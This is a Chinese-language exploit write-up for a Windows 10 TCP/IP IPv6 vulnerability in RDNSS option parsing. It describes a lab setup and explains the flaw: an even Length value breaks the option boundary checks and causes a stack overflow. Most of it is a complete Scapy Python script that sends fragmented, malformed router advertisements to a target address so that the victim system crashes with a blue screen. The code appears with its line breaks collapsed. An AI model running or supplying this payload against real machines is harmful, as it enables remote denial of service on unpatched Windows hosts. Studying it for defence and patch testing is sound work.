漏洞环境

攻击机：windows 10

（python版本：3.7 ，安装了scapy依赖）

受害机环境：windows10 1909

受害机网络开启ipv6支持

打开cmd输入ipconfig查看受害机ipv6地址为

fd15:4ba5:5a2b:1008:8c9a:8a2b:4489:74aa

攻击机的ipv6地址为

fe80::9835:b7ba:c813:5f6a%10

要求攻击机与受害机网络畅通

漏洞分析

根据rfc5006描述，RDNSS包的length应为奇数，而当攻击者构造的RDNSS包的Length为偶数时，Windows TCP/IP 在检查包过程中会根据Length 来获取每个包的偏移，遍历解析，导致对Address of IPv6 Recursive DNS Servers 和下一个 RDNSS 选项的边界解析错误，从而绕过验证，将攻击者伪造的 option包进行解析，造成栈溢出，从而导致系统崩溃。

漏洞利用

payload：

from scapy.all import *from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6v6_dst = "fd15:4ba5:5a2b:1008:109f:9a46:8d19:f103"v6_src = "fe80::501a:49b7:b7d:5362%12"p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"p_test = p_test_half + 'A'.encode()*4c = ICMPv6NDOptEFA()e = ICMPv6NDOptRDNSS()e.len = 21e.dns = ["AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]aaa = ICMPv6NDOptRDNSS()aaa.len = 8pkt = ICMPv6ND_RA() / aaa / \Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / ep_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \IPv6ExtHdrFragment()/pktl=fragment6(p_test_frag, 200)for p in l:send(p)

构造特定的ipv6数据包，发送给受害者机器，使其蓝屏

参考链接：https://mp./s?__biz=MzI0NzEwOTM0MA==&mid=2652485147&idx=1&sn=384b9655137bf0f1fa1e08f8221d25df&chksm=f25815a8c52f9cbe41ba99a559912fd8eed5280edd8bcde12a6e0f3b52484203ed44124fc16c&mpshare=1&scene=23&srcid=1117oZTZtZ441K2KodFkILk4&sharer_sharetime=1605620438301&sharer_shareid=a9146a5cec9e0abd7cba45f1a31897fd#rd